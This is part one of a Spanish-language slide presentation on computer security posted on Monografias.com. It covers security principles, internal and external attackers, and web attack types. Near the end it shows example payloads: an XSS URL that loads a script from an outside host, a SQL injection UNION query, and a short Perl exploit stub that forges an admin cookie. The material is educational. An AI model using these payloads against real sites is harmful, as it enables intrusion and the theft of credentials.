Monografias.com > Computación > Redes
Descargar Imprimir Comentar Ver trabajos relacionados

Seguridad informática II




Enviado por Pablo Turmero



Partes: 1, 2

    Monografias.com

    Seguridad Informática

    – Fundamentos de la seguridad informática

    – Seguridad en ambiente de servidores

    – Seguridad en plataformas Web

    – Cómo proteger las redes Wi-Fi

    – Recomendaciones generales para Internet

    Monografias.com

    Seguridad Informática
    CONCEPTOS BÁSICOS DE LA SEGURIDAD INFORMÁTICA
    CONFIDENCIALIDAD
    INTEGRIDAD
    DISPONIBILIDAD
    AUTENTICIDAD

    Monografias.com

    Seguridad Informática
    CONCEPTOS BÁSICOS DE LA SEGURIDAD INFORMÁTICA
    No existe la absoluta seguridad !!

    Todo es rompible si se le aplica fuerza. Una caja de vidrio se puede romper, pero también una caja fuerte de titanio. ¿Qué es más seguro: la caja de vidrio o la de titanio?

    Evidentemente la de titanio, pero esto depende solamente de que herramienta utilicemos para romperla.

    Todo se puede vulnerar. La única razón por la cual utilizamos rejas de fierros en nuestras casas y los bancos es porque hace que el ataque sea más lento.

    Monografias.com

    Seguridad Informática
    CONCEPTOS BÁSICOS DE LA SEGURIDAD INFORMÁTICA
    Entonces, ¿Cómo nos protegemos de la forma más eficiente posible?
    Determinando que queremos proteger (ej: Hardware, datos privados, datos públicos, sistemas, etc)?
    Estableciendo prioridades de los factores a proteger
    Formando políticas de seguridad
    Manteniendo la seguridad en el tiempo

    Monografias.com

    Seguridad Informática
    CONCEPTOS BÁSICOS DE LA SEGURIDAD INFORMÁTICA
    Debemos enfocarnos en REDUCIR EL RIESGO, y no en tratar de eliminar las amenazas, ya que es imposible.

    Para eso debemos saber de QUE o QUIENES nos protegemos y también COMO nos atacan.

    Monografias.com

    Seguridad Informática
    SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB

    Monografias.com

    Seguridad Informática
    Ataques Internos

    – Premeditación (Empleados mal intencionados o ex empleados con información privilegiada)?
    – Descuido
    – Ignorancia
    – Indiferencia de las politicas de seguridad

    Ataques externos

    Hackers, Crackers, Lammers, Script-Kiddies
    – Motivaciones: Ranking, reto personal, robo de datos, pruebas (pen test), etc.

    SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB

    Monografias.com

    Seguridad Informática
    Ataques Internos

    Suplantación de identidad
    Sniffing (Incluso administradores pueden hacer sniffing. Sugerencia: CIFRAR)?
    Robo de información (Ej: para la competencia)?
    Virus, Troyanos, Gusanos
    Espionaje: Trashing, Shoulder Surfing, Grabaciones, etc
    Keylogging – Keycatching
    Keycatcher:
    SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB

    Monografias.com

    Seguridad Informática
    Ataques Externos

    Ataques contra servicios WEB
    Cross Site Scripting (XSS)?
    SQL Injection
    Exploits
    Robo de Identidad
    Denegación de Servicio (DoS) y Denegación de Servicio Distribuido (DDoS)?
    SPAM
    VIRUS
    Phishing (Whishing, Hishing)?
    Troyanos
    SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB

    Monografias.com

    Seguridad Informática
    XSS
    SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB

    Monografias.com

    Seguridad Informática
    XSS:

    http://docs.info.apple.com/article.html?artnum=';a=document.createElement('script');a.src='//h4k.in/i.js';document.body.appendChild(a);//';alert(1)//%22;alert(2)//%22;alert(3)//–%3E

    SQL Injection:

    http://www.sitiovulnerable.com/index.php?id=10 UNION SELECT TOP 1 login_name FROM admin_login–
    SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB

    Monografias.com

    Seguridad Informática
    #!/usr/bin/perl
    use LWP::UserAgent;
    use HTTP::Cookies;
    $host=shift;
    if ($host eq "") {
    print "Usage: webeye-xp.pl < host name>n";
    exit;
    }
    my $browser = LWP::UserAgent->new();
    my $resp = $browser->get("http://$host/admin/wg_user-info.ml","Cookie","USER_ID=0; path=/;");
    $t = $resp->content;
    #print $t;
    ";
    Ejemplo de un exploit en PERL:
    SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB

    Partes: 1, 2

    Página siguiente 

    Nota al lector: es posible que esta página no contenga todos los componentes del trabajo original (pies de página, avanzadas formulas matemáticas, esquemas o tablas complejas, etc.). Recuerde que para ver el trabajo en su versión original completa, puede descargarlo desde el menú superior.

    Todos los documentos disponibles en este sitio expresan los puntos de vista de sus respectivos autores y no de Monografias.com. El objetivo de Monografias.com es poner el conocimiento a disposición de toda su comunidad. Queda bajo la responsabilidad de cada lector el eventual uso que se le de a esta información. Asimismo, es obligatoria la cita del autor del contenido y de Monografias.com como fuentes de información.

    Categorias
    Newsletter